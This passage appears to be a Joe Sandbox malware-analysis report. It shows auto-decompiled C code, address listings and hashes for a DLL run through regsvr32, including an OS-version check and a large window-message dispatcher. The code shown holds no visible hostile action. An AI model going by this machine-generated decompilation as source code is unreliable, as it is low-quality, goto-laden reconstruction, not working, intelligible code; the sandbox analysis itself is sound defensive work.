                                                                                                            				struct _OSVERSIONINFOA _v148;
                                                                                                            				long _t6;
                                                                                                            
                                                                                                            				_v148.dwOSVersionInfoSize = 0x94;
                                                                                                            				GetVersionExA( &_v148);
                                                                                                            				if(_v148.dwPlatformId != 2) {
                                                                                                            					L2:
                                                                                                            					_t6 = E10001090;
                                                                                                            				} else {
                                                                                                            					_t6 = E100010F0;
                                                                                                            					if(_v148.dwMajorVersion < 5) {
                                                                                                            						goto L2;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				InterlockedExchange(0x1004b0a0, _t6);
                                                                                                            				return  *0x1004b0a0();
                                                                                                            			}






                                                                                                            APIs
                                                                                                            • GetVersionExA.KERNEL32 ref: 10001112
                                                                                                            • InterlockedExchange.KERNEL32(1004B0A0,10001090), ref: 10001136
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExchangeInterlockedVersion
                                                                                                            • String ID:
                                                                                                            • API String ID: 2700998522-0
                                                                                                            • Opcode ID: 260be64d31472810d38a7c4b3362e1b1b4b1187a9832a1863536309ce5a7bdb4
                                                                                                            • Instruction ID: cbef01c832245ed46ef0d161ca004d6dcd336c7d999a9848a1027e40418eb20f
                                                                                                            • Opcode Fuzzy Hash: 260be64d31472810d38a7c4b3362e1b1b4b1187a9832a1863536309ce5a7bdb4
                                                                                                            • Instruction Fuzzy Hash: E8E08C304043889FF320EB24CD48B9E76F5FB08282FC04828F2A5C200AD734494ACB47
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 22%
                                                                                                            			E10023973(intOrPtr* __ecx) {
                                                                                                            				signed int _t141;
                                                                                                            				signed int _t146;
                                                                                                            				signed int _t148;
                                                                                                            				signed int _t149;
                                                                                                            				unsigned int _t150;
                                                                                                            				signed int _t152;
                                                                                                            				signed int _t156;
                                                                                                            				signed int* _t157;
                                                                                                            				signed int _t159;
                                                                                                            				signed int _t161;
                                                                                                            				unsigned int _t163;
                                                                                                            				signed int _t167;
                                                                                                            				signed int _t171;
                                                                                                            				unsigned int _t174;
                                                                                                            				signed int _t175;
                                                                                                            				signed int _t179;
                                                                                                            				signed int _t180;
                                                                                                            				signed int* _t184;
                                                                                                            				signed int _t186;
                                                                                                            				signed int _t194;
                                                                                                            				unsigned int _t204;
                                                                                                            				void* _t206;
                                                                                                            
                                                                                                            				_t187 = __ecx;
                                                                                                            				E10011BF0(0x1003a61c, _t206);
                                                                                                            				 *(_t206 - 0x10) =  *(_t206 - 0x10) & 0x00000000;
                                                                                                            				_t179 =  *(_t206 + 8);
                                                                                                            				_t201 = __ecx;
                                                                                                            				if(_t179 != 0x111) {
                                                                                                            					if(_t179 != 0x4e) {
                                                                                                            						_t204 =  *(_t206 + 0x10);
                                                                                                            						if(_t179 == 6) {
                                                                                                            							E100233A0(_t187, _t201,  *((intOrPtr*)(_t206 + 0xc)), E100220EE(_t206, _t204));
                                                                                                            						}
                                                                                                            						if(_t179 != 0x20) {
                                                                                                            							L10:
                                                                                                            							_t141 =  *(_t201 + 0x48);
                                                                                                            							if(_t141 == 0) {
                                                                                                            								L19:
                                                                                                            								_t180 =  *((intOrPtr*)( *_t201 + 0x28))();
                                                                                                            								 *(_t206 - 0x14) = _t180;
                                                                                                            								E10037A1B(7);
                                                                                                            								_t184 = 0x1004d5f8 + (((_t180 ^  *(_t206 + 8)) & 0x000001ff) + ((_t180 ^  *(_t206 + 8)) & 0x000001ff) * 2) * 4;
                                                                                                            								_t146 =  *(_t206 - 0x14);
                                                                                                            								if( *(_t206 + 8) !=  *_t184) {
                                                                                                            									L24:
                                                                                                            									 *_t184 =  *(_t206 + 8);
                                                                                                            									_t184[2] = _t146;
                                                                                                            									while(1) {
                                                                                                            										if(_t146 == 0) {
                                                                                                            											break;
                                                                                                            										}
                                                                                                            										_t147 =  *(_t206 - 0x14);
                                                                                                            										_push(0);
                                                                                                            										_push(0);
                                                                                                            										if( *(_t206 + 8) >= 0xc000) {
                                                                                                            											_t148 =  *(_t147 + 4);
                                                                                                            											while(1) {
                                                                                                            												_push(0xc000);
                                                                                                            												_push(_t148);
                                                                                                            												_t149 = E10020CD3();
                                                                                                            												 *(_t206 + 0x10) = _t149;
                                                                                                            												if(_t149 == 0) {
                                                                                                            													break;
                                                                                                            												}
                                                                                                            												_t150 =  *(_t206 + 0x10);
                                                                                                            												_t152 =  *(_t206 + 0x10);
                                                                                                            												if( *((intOrPtr*)( *((intOrPtr*)(_t150 + 0x10)))) ==  *(_t206 + 8)) {
                                                                                                            													_t184[1] = _t152;
                                                                                                            													E10037A7E(7);
                                                                                                            													L105:
                                                                                                            													_t156 =  *((intOrPtr*)( *((intOrPtr*)( *(_t206 + 0x10) + 0x14))))( *((intOrPtr*)(_t206 + 0xc)), _t204);
                                                                                                            													L106:
                                                                                                            													 *(_t206 - 0x10) = _t156;
                                                                                                            													goto L107;
                                                                                                            												}
                                                                                                            												_push(0);
                                                                                                            												_push(0);
                                                                                                            												_t148 = _t152 + 0x18;
                                                                                                            											}
                                                                                                            											L34:
                                                                                                            											_t146 =  *( *(_t206 - 0x14));
                                                                                                            											 *(_t206 - 0x14) = _t146;
                                                                                                            											continue;
                                                                                                            										}
                                                                                                            										_push( *(_t206 + 8));
                                                                                                            										_push( *(_t147 + 4));
                                                                                                            										_t161 = E10020CD3();
                                                                                                            										 *(_t206 + 0x10) = _t161;
                                                                                                            										if(_t161 == 0) {
                                                                                                            											goto L34;
                                                                                                            										}
                                                                                                            										_t184[1] = _t161;
                                                                                                            										E10037A7E(7);
                                                                                                            										L28:
                                                                                                            										_t163 =  *(_t206 + 0x10);
                                                                                                            										_t184 =  *(_t163 + 0x14);
                                                                                                            										_t147 =  *(_t163 + 0x10);
                                                                                                            										_t194 =  *(_t163 + 0x10) - 1;
                                                                                                            										if(_t194 > 0x40) {
                                                                                                            											goto L107;
                                                                                                            										}
                                                                                                            										switch( *((intOrPtr*)(_t194 * 4 +  &M10023E7A))) {
                                                                                                            											case 0:
                                                                                                            												_push( *(__ebp + 0xc));
                                                                                                            												_push(E10029068());
                                                                                                            												goto L55;
                                                                                                            											case 1:
                                                                                                            												_push( *(__ebp + 0xc));
                                                                                                            												goto L55;
                                                                                                            											case 2:
                                                                                                            												_push(__esi >> 0x10);
                                                                                                            												__eax = __si & 0x0000ffff;
                                                                                                            												_push(__si & 0x0000ffff);
                                                                                                            												__eax = E100220EE(__ebp,  *(__ebp + 0xc));
                                                                                                            												goto L59;
                                                                                                            											case 3:
                                                                                                            												_push(__esi);
                                                                                                            												__eax = E100220EE(__ebp,  *(__ebp + 0xc));
                                                                                                            												goto L84;
                                                                                                            											case 4:
                                                                                                            												_push(__esi);
                                                                                                            												L55:
                                                                                                            												__ecx = __edi;
                                                                                                            												__eax =  *__ebx();
                                                                                                            												goto L106;
                                                                                                            											case 5:
                                                                                                            												__ecx = __ebp - 0x24;
                                                                                                            												E10028C26(__ebp - 0x24) =  *(__esi + 4);
                                                                                                            												 *(__ebp - 4) =  *(__ebp - 4) & 0x00000000;
                                                                                                            												__ecx = __ebp - 0x74;
                                                                                                            												 *(__ebp - 0x20) =  *(__esi + 4);
                                                                                                            												__eax = E10021613(__ebp - 0x74, __eflags);
                                                                                                            												__eax =  *__esi;
                                                                                                            												__esi =  *(__esi + 8);
                                                                                                            												_push(__eax);
                                                                                                            												 *(__ebp - 4) = 1;
                                                                                                            												 *(__ebp - 0x58) = __eax;
                                                                                                            												__eax = E10022115();
                                                                                                            												__eflags = __eax;
                                                                                                            												if(__eax == 0) {
                                                                                                            													__eax =  *(__edi + 0x48);
                                                                                                            													__eflags = __eax;
                                                                                                            													if(__eax != 0) {
                                                                                                            														__ecx = __eax + 0x20;
                                                                                                            														__eax = E1001E69B(__eax + 0x20,  *(__ebp - 0x58));
                                                                                                            														__eflags = __eax;
                                                                                                            														if(__eax != 0) {
                                                                                                            															 *(__ebp - 0x28) = __eax;
                                                                                                            														}
                                                                                                            													}
                                                                                                            													__eax = __ebp - 0x74;
                                                                                                            												}
                                                                                                            												_push(__esi);
                                                                                                            												_push(__eax);
                                                                                                            												__eax = __ebp - 0x24;
                                                                                                            												_push(__ebp - 0x24);
                                                                                                            												__ecx = __edi;
                                                                                                            												__eax =  *__ebx();
                                                                                                            												 *(__ebp - 0x20) =  *(__ebp - 0x20) & 0x00000000;
                                                                                                            												 *(__ebp - 0x58) =  *(__ebp - 0x58) & 0x00000000;
                                                                                                            												__ecx = __ebp - 0x74;
                                                                                                            												 *(__ebp - 0x10) = __ebp - 0x24;
                                                                                                            												 *(__ebp - 4) = 0;
                                                                                                            												__eax = E10022977(__ebp - 0x74);
                                                                                                            												goto L51;
                                                                                                            											case 6:
                                                                                                            												__ecx = __ebp - 0x24;
                                                                                                            												E10028C26(__ebp - 0x24) =  *(__esi + 4);
                                                                                                            												_push( *(__esi + 8));
                                                                                                            												 *(__ebp - 0x20) =  *(__esi + 4);
                                                                                                            												__eax = __ebp - 0x24;
                                                                                                            												_push(__ebp - 0x24);
                                                                                                            												__ecx = __edi;
                                                                                                            												 *(__ebp - 4) = 2;
                                                                                                            												__eax =  *__ebx();
                                                                                                            												_t89 = __ebp - 0x20;
                                                                                                            												 *_t89 =  *(__ebp - 0x20) & 0x00000000;
                                                                                                            												__eflags =  *_t89;
                                                                                                            												 *(__ebp - 0x10) = __ebp - 0x24;
                                                                                                            												L51:
                                                                                                            												 *(__ebp - 4) =  *(__ebp - 4) | 0xffffffff;
                                                                                                            												__ecx = __ebp - 0x24;
                                                                                                            												__eax = E100290DE(__ebp - 0x24);
                                                                                                            												goto L107;
                                                                                                            											case 7:
                                                                                                            												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
                                                                                                            												_push( *(__ebp + 0xc) >> 0x10);
                                                                                                            												__eax = E100220EE(__ebp, __esi);
                                                                                                            												goto L58;
                                                                                                            											case 8:
                                                                                                            												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
                                                                                                            												_push( *(__ebp + 0xc) >> 0x10);
                                                                                                            												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                                                                                                            												goto L84;
                                                                                                            											case 9:
                                                                                                            												_push(__esi);
                                                                                                            												_push( *(__ebp + 0xc));
                                                                                                            												goto L85;
                                                                                                            											case 0xa:
                                                                                                            												_push(__esi);
                                                                                                            												_push(E10026280());
                                                                                                            												__eax =  *(__ebp + 0xc);
                                                                                                            												__eax =  *(__ebp + 0xc) >> 0x10;
                                                                                                            												__eflags = __eax;
                                                                                                            												L58:
                                                                                                            												_push(__eax);
                                                                                                            												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                                                                                                            												L59:
                                                                                                            												_push(__eax);
                                                                                                            												__ecx = __edi;
                                                                                                            												__eax =  *__ebx();
                                                                                                            												goto L106;
                                                                                                            											case 0xb:
                                                                                                            												__ecx = __edi;
                                                                                                            												__eax =  *__ebx();
                                                                                                            												goto L107;
                                                                                                            											case 0xc:
                                                                                                            												_push( *(__ebp + 0xc));
                                                                                                            												goto L91;
                                                                                                            											case 0xd:
                                                                                                            												_push(__esi);
                                                                                                            												goto L88;
                                                                                                            											case 0xe:
                                                                                                            												__eax =  *(__ebp + 0xc);
                                                                                                            												__eax =  *(__ebp + 0xc) >> 0x10;
                                                                                                            												__eflags = __eax;
                                                                                                            												_push(__eax);
                                                                                                            												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                                                                                                            												goto L63;
                                                                                                            											case 0xf:
                                                                                                            												__esi = __esi >> 0x10;
                                                                                                            												__eax = __ax;
                                                                                                            												_push(__ax);
                                                                                                            												__eax = __si;
                                                                                                            												goto L63;
                                                                                                            											case 0x10:
                                                                                                            												_push(__esi >> 0x10);
                                                                                                            												__eax = __si & 0x0000ffff;
                                                                                                            												goto L95;
                                                                                                            											case 0x11:
                                                                                                            												_push(E100220EE(__ebp, __esi));
                                                                                                            												L88:
                                                                                                            												_push( *(__ebp + 0xc));
                                                                                                            												goto L89;
                                                                                                            											case 0x12:
                                                                                                            												__ecx = __edi;
                                                                                                            												__eax =  *__ebx();
                                                                                                            												goto L106;
                                                                                                            											case 0x13:
                                                                                                            												_push(E100220EE(__ebp,  *(__ebp + 0xc)));
                                                                                                            												_push(E100220EE(__ebp, __esi));
                                                                                                            												__eax = 0;
                                                                                                            												__eflags =  *((intOrPtr*)(__edi + 0x1c)) - __esi;
                                                                                                            												_t107 =  *((intOrPtr*)(__edi + 0x1c)) == __esi;
                                                                                                            												__eflags = _t107;
                                                                                                            												__eax = 0 | _t107;
                                                                                                            												goto L67;
                                                                                                            											case 0x14:
                                                                                                            												_push( *(__ebp + 0xc));
                                                                                                            												__eax = E10029068();
                                                                                                            												goto L69;
                                                                                                            											case 0x15:
                                                                                                            												_push( *(__ebp + 0xc));
                                                                                                            												__eax = E10026280();
                                                                                                            												goto L69;
                                                                                                            											case 0x16:
                                                                                                            												_push(__esi >> 0x10);
                                                                                                            												__eax = __si & 0x0000ffff;
                                                                                                            												_push(__si & 0x0000ffff);
                                                                                                            												_push( *(__ebp + 0xc));
                                                                                                            												__eax = E10026280();
                                                                                                            												goto L67;
                                                                                                            											case 0x17:
                                                                                                            												_push( *(__ebp + 0xc));
                                                                                                            												goto L74;
                                                                                                            											case 0x18:
                                                                                                            												_push(__esi);
                                                                                                            												L74:
                                                                                                            												__eax = E100220EE(__ebp);
                                                                                                            												L69:
                                                                                                            												_push(__eax);
                                                                                                            												goto L91;
                                                                                                            											case 0x19:
                                                                                                            												_push(__esi >> 0x10);
                                                                                                            												__eax = __si & 0x0000ffff;
                                                                                                            												goto L77;
                                                                                                            											case 0x1a:
                                                                                                            												__eax = __si;
                                                                                                            												__eflags = __esi;
                                                                                                            												__ecx = __si;
                                                                                                            												_push(__si);
                                                                                                            												L77:
                                                                                                            												_push(__eax);
                                                                                                            												__eax = E100220EE(__ebp,  *(__ebp + 0xc));
                                                                                                            												goto L67;
                                                                                                            											case 0x1b:
                                                                                                            												_push(__esi);
                                                                                                            												__eax = E100220EE(__ebp,  *(__ebp + 0xc));
                                                                                                            												L63:
                                                                                                            												_push(__eax);
                                                                                                            												goto L89;
                                                                                                            											case 0x1c:
                                                                                                            												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
                                                                                                            												_push( *(__ebp + 0xc) >> 0x10);
                                                                                                            												__eax = E100220EE(__ebp, __esi);
                                                                                                            												goto L93;
                                                                                                            											case 0x1d:
                                                                                                            												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
                                                                                                            												__eflags = __eax - 0x27;
                                                                                                            												__ecx = __cx;
                                                                                                            												 *((intOrPtr*)(__ebp + 8)) = __cx;
                                                                                                            												 *(__ebp + 0xc) = __cx;
                                                                                                            												if(__eax != 0x27) {
                                                                                                            													_push( *(__ebp + 0xc));
                                                                                                            													_push( *((intOrPtr*)(__ebp + 8)));
                                                                                                            													L89:
                                                                                                            													__ecx = __edi;
                                                                                                            													__eax =  *__ebx();
                                                                                                            													goto L107;
                                                                                                            												}
                                                                                                            												_push(E100220EE(__ebp, __esi));
                                                                                                            												_push( *(__ebp + 0xc));
                                                                                                            												_push( *((intOrPtr*)(__ebp + 8)));
                                                                                                            												goto L96;
                                                                                                            											case 0x1e:
                                                                                                            												_push(__esi);
                                                                                                            												L91:
                                                                                                            												__ecx = __edi;
                                                                                                            												__eax =  *__ebx();
                                                                                                            												goto L107;
                                                                                                            											case 0x1f:
                                                                                                            												_push(__esi);
                                                                                                            												_push( *(__ebp + 0xc));
                                                                                                            												__ecx = __edi;
                                                                                                            												__eax =  *__ebx();
                                                                                                            												goto L98;
                                                                                                            											case 0x20:
                                                                                                            												__eax = __si;
                                                                                                            												__eflags = __esi;
                                                                                                            												__ecx = __si;
                                                                                                            												_push(__si);
                                                                                                            												L84:
                                                                                                            												_push(__eax);
                                                                                                            												L85:
                                                                                                            												__ecx = __edi;
                                                                                                            												__eax =  *__ebx();
                                                                                                            												goto L106;
                                                                                                            											case 0x21:
                                                                                                            												__eax =  *(__ebp + 0xc);
                                                                                                            												_push(__esi);
                                                                                                            												__eax =  *(__ebp + 0xc) >> 0x10;
                                                                                                            												__eflags = __eax;
                                                                                                            												L93:
                                                                                                            												_push(__eax);
                                                                                                            												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                                                                                                            												L67:
                                                                                                            												_push(__eax);
                                                                                                            												goto L96;
                                                                                                            											case 0x22:
                                                                                                            												__eax = __si;
                                                                                                            												__eflags = __esi;
                                                                                                            												__ecx = __si;
                                                                                                            												_push(__si);
                                                                                                            												L95:
                                                                                                            												_push(__eax);
                                                                                                            												_push( *(__ebp + 0xc));
                                                                                                            												L96:
                                                                                                            												__ecx = __edi;
                                                                                                            												__eax =  *__ebx();
                                                                                                            												goto L107;
                                                                                                            											case 0x23:
                                                                                                            												__eax = __si & 0x0000ffff;
                                                                                                            												_push(__esi);
                                                                                                            												_push(__si & 0x0000ffff);
                                                                                                            												__eax =  *(__ebp + 0xc);
                                                                                                            												__eax =  *(__ebp + 0xc) >> 0x10;
                                                                                                            												__eflags = __eax;
                                                                                                            												_push(__eax);
                                                                                                            												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                                                                                                            												_push( *(__ebp + 0xc) & 0x0000ffff);
                                                                                                            												__ecx = __edi;
                                                                                                            												__eax =  *__ebx();
                                                                                                            												 *(__ebp - 0x10) =  *(__ebp + 0xc) & 0x0000ffff;
                                                                                                            												L100:
                                                                                                            												__eflags = _t175;
                                                                                                            												if(_t175 != 0) {
                                                                                                            													goto L107;
                                                                                                            												}
                                                                                                            												goto L37;
                                                                                                            											case 0x24:
                                                                                                            												goto L107;
                                                                                                            											case 0x25:
                                                                                                            												__ecx = __edi;
                                                                                                            												__eax =  *__ebx();
                                                                                                            												__eflags = __eax;
                                                                                                            												 *(__ebp - 0x10) = __eax;
                                                                                                            												if(__eax == 0) {
                                                                                                            													goto L107;
                                                                                                            												}
                                                                                                            												L37:
                                                                                                            												_t159 = 0;
                                                                                                            												__eflags = 0;
                                                                                                            												goto L38;
                                                                                                            										}
                                                                                                            									}
                                                                                                            									_t54 =  &(_t184[1]);
                                                                                                            									 *_t54 = _t184[1] & _t146;
                                                                                                            									E10037A7E(7);
                                                                                                            									goto L37;
                                                                                                            								}
                                                                                                            								if(_t146 != _t184[2]) {
                                                                                                            									goto L24;
                                                                                                            								}
                                                                                                            								_t186 = _t184[1];
                                                                                                            								 *(_t206 + 0x10) = _t186;
                                                                                                            								E10037A7E(7);
                                                                                                            								if(_t186 == 0) {
                                                                                                            									goto L37;
                                                                                                            								}
                                                                                                            								if( *(_t206 + 8) < 0xc000) {
                                                                                                            									goto L28;
                                                                                                            								}
                                                                                                            								goto L105;
                                                                                                            							}
                                                                                                            							if( *(_t141 + 0x70) <= 0) {
                                                                                                            								goto L19;
                                                                                                            							}
                                                                                                            							if(_t179 < 0x200) {
                                                                                                            								L14:
                                                                                                            								if(_t179 < 0x100) {
                                                                                                            									L16:
                                                                                                            									if(_t179 < 0x281) {
                                                                                                            										goto L19;
                                                                                                            									}
                                                                                                            									if(_t179 > 0x291) {
                                                                                                            										goto L19;
                                                                                                            									}
                                                                                                            									L18:
                                                                                                            									_t167 =  *((intOrPtr*)( *( *(_t201 + 0x48)) + 0x94))(_t179,  *((intOrPtr*)(_t206 + 0xc)), _t204, _t206 - 0x10);
                                                                                                            									if(_t167 != 0) {
                                                                                                            										goto L107;
                                                                                                            									}
                                                                                                            									goto L19;
                                                                                                            								}
                                                                                                            								if(_t179 <= 0x10f) {
                                                                                                            									goto L18;
                                                                                                            								}
                                                                                                            								goto L16;
                                                                                                            							}
                                                                                                            							if(_t179 <= 0x209) {
                                                                                                            								goto L18;
                                                                                                            							}
                                                                                                            							goto L14;
                                                                                                            						} else {
                                                                                                            							_t171 = E10023401(_t201, _t204, _t204 >> 0x10);
                                                                                                            							if(_t171 != 0) {
                                                                                                            								L98:
                                                                                                            								 *(_t206 - 0x10) = 1;
                                                                                                            								L107:
                                                                                                            								_t157 =  *(_t206 + 0x14);
                                                                                                            								if(_t157 != 0) {
                                                                                                            									 *_t157 =  *(_t206 - 0x10);
                                                                                                            								}
                                                                                                            								_t159 = 1;
                                                                                                            								L38:
                                                                                                            								 *[fs:0x0] =  *((intOrPtr*)(_t206 - 0xc));
                                                                                                            								return _t159;
                                                                                                            							}
                                                                                                            							goto L10;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					_t174 =  *(_t206 + 0x10);
                                                                                                            					if( *_t174 == 0) {
                                                                                                            						goto L37;
                                                                                                            					}
                                                                                                            					_push(_t206 - 0x10);
                                                                                                            					_push(_t174);
                                                                                                            					_push( *((intOrPtr*)(_t206 + 0xc)));
                                                                                                            					_t175 =  *((intOrPtr*)( *__ecx + 0xec))();
                                                                                                            					goto L100;
                                                                                                            				}
                                                                                                            				_push( *(_t206 + 0x10));
                                                                                                            				_push( *((intOrPtr*)(_t206 + 0xc)));
                                                                                                            				if( *((intOrPtr*)( *__ecx + 0xe8))() == 0) {
                                                                                                            					goto L37;
                                                                                                            				}
                                                                                                            				goto L98;
                                                                                                            			}

























                                                                                                            0x10023d48
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023d4d
                                                                                                            0x10023d50
                                                                                                            0x10023d53
                                                                                                            0x10023d56
                                                                                                            0x10023d57
                                                                                                            0x10023d57
                                                                                                            0x10023d5b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023d62
                                                                                                            0x10023d66
                                                                                                            0x10023cc9
                                                                                                            0x10023cc9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023d73
                                                                                                            0x10023d76
                                                                                                            0x10023d78
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023d85
                                                                                                            0x10023d88
                                                                                                            0x10023d8b
                                                                                                            0x10023d8e
                                                                                                            0x10023d91
                                                                                                            0x10023d94
                                                                                                            0x10023da5
                                                                                                            0x10023da8
                                                                                                            0x10023dce
                                                                                                            0x10023dce
                                                                                                            0x10023dd0
                                                                                                            0x00000000
                                                                                                            0x10023dd0
                                                                                                            0x10023d9c
                                                                                                            0x10023d9d
                                                                                                            0x10023da0
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023dd7
                                                                                                            0x10023dd8
                                                                                                            0x10023dd8
                                                                                                            0x10023dda
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023e06
                                                                                                            0x10023e07
                                                                                                            0x10023e0a
                                                                                                            0x10023e0c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023dad
                                                                                                            0x10023db0
                                                                                                            0x10023db3
                                                                                                            0x10023db6
                                                                                                            0x10023db7
                                                                                                            0x10023db7
                                                                                                            0x10023db8
                                                                                                            0x10023db8
                                                                                                            0x10023dba
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023de1
                                                                                                            0x10023de4
                                                                                                            0x10023de5
                                                                                                            0x10023de5
                                                                                                            0x10023de8
                                                                                                            0x10023de8
                                                                                                            0x10023de9
                                                                                                            0x10023d03
                                                                                                            0x10023d03
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023df2
                                                                                                            0x10023df5
                                                                                                            0x10023df8
                                                                                                            0x10023dfb
                                                                                                            0x10023dfc
                                                                                                            0x10023dfc
                                                                                                            0x10023dfd
                                                                                                            0x10023e00
                                                                                                            0x10023e00
                                                                                                            0x10023e02
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023e17
                                                                                                            0x10023e1d
                                                                                                            0x10023e1e
                                                                                                            0x10023e1f
                                                                                                            0x10023e22
                                                                                                            0x10023e22
                                                                                                            0x10023e25
                                                                                                            0x10023e26
                                                                                                            0x10023e2a
                                                                                                            0x10023e2b
                                                                                                            0x10023e2d
                                                                                                            0x10023e2f
                                                                                                            0x10023e32
                                                                                                            0x10023e32
                                                                                                            0x10023e34
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023e3b
                                                                                                            0x10023e3d
                                                                                                            0x10023e3f
                                                                                                            0x10023e41
                                                                                                            0x10023e44
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023b5e
                                                                                                            0x10023b5e
                                                                                                            0x10023b5e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023b0b
                                                                                                            0x10023b54
                                                                                                            0x10023b54
                                                                                                            0x10023b59
                                                                                                            0x00000000
                                                                                                            0x10023b59
                                                                                                            0x10023a98
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023a9a
                                                                                                            0x10023a9f
                                                                                                            0x10023aa2
                                                                                                            0x10023aa9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023ab6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023ab8
                                                                                                            0x10023a17
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023a1f
                                                                                                            0x10023a29
                                                                                                            0x10023a2f
                                                                                                            0x10023a39
                                                                                                            0x10023a3f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023a47
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023a49
                                                                                                            0x10023a57
                                                                                                            0x10023a5f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023a5f
                                                                                                            0x10023a37
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10023a37
                                                                                                            0x10023a27
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100239f4
                                                                                                            0x100239ff
                                                                                                            0x10023a06
                                                                                                            0x10023e0e
                                                                                                            0x10023e0e
                                                                                                            0x10023e66
                                                                                                            0x10023e66
                                                                                                            0x10023e6b
                                                                                                            0x10023e70
                                                                                                            0x10023e70
                                                                                                            0x10023e74
                                                                                                            0x10023b60
                                                                                                            0x10023b66
                                                                                                            0x10023b6e
                                                                                                            0x10023b6e
                                                                                                            0x00000000
                                                                                                            0x10023a06
                                                                                                            0x100239f2
                                                                                                            0x100239b4
                                                                                                            0x100239ba
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100239c5
                                                                                                            0x100239c6
                                                                                                            0x100239c7
                                                                                                            0x100239cc
                                                                                                            0x00000000
                                                                                                            0x100239cc
                                                                                                            0x10023994
                                                                                                            0x10023999
                                                                                                            0x100239a4
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: H_prolog
                                                                                                            • String ID:
                                                                                                            • API String ID: 3519838083-0
                                                                                                            • Opcode ID: d40d6d6e6cef6803208f6e3609c2f1027a444feec77636e89629d5b53b439ef5
                                                                                                            • Instruction ID: 1e1e474db0047197a83ae3098e3256374823658fb0d5be61515164714213afbe
                                                                                                            • Opcode Fuzzy Hash: d40d6d6e6cef6803208f6e3609c2f1027a444feec77636e89629d5b53b439ef5
                                                                                                            • Instruction Fuzzy Hash: 52E19C74600209EFDF25CF58EC81AAE7BA9EF04750FA1C515F819EB292C735EA10DB61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1001A444(void* __ebx, int _a4) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				char _v10;
                                                                                                            				char _v16;
                                                                                                            				void* __ebp;
                                                                                                            				intOrPtr _t7;
                                                                                                            				signed int _t9;
                                                                                                            				signed int _t11;
                                                                                                            				void* _t14;
                                                                                                            				void* _t17;
                                                                                                            
                                                                                                            				_t7 =  *0x1004c470; // 0xf3933a06
                                                                                                            				_v8 = _t7;
                                                                                                            				_v10 = 0;
                                                                                                            				_t9 = GetLocaleInfoA(_a4, 0x1004,  &_v16, 6);
                                                                                                            				if(_t9 != 0) {
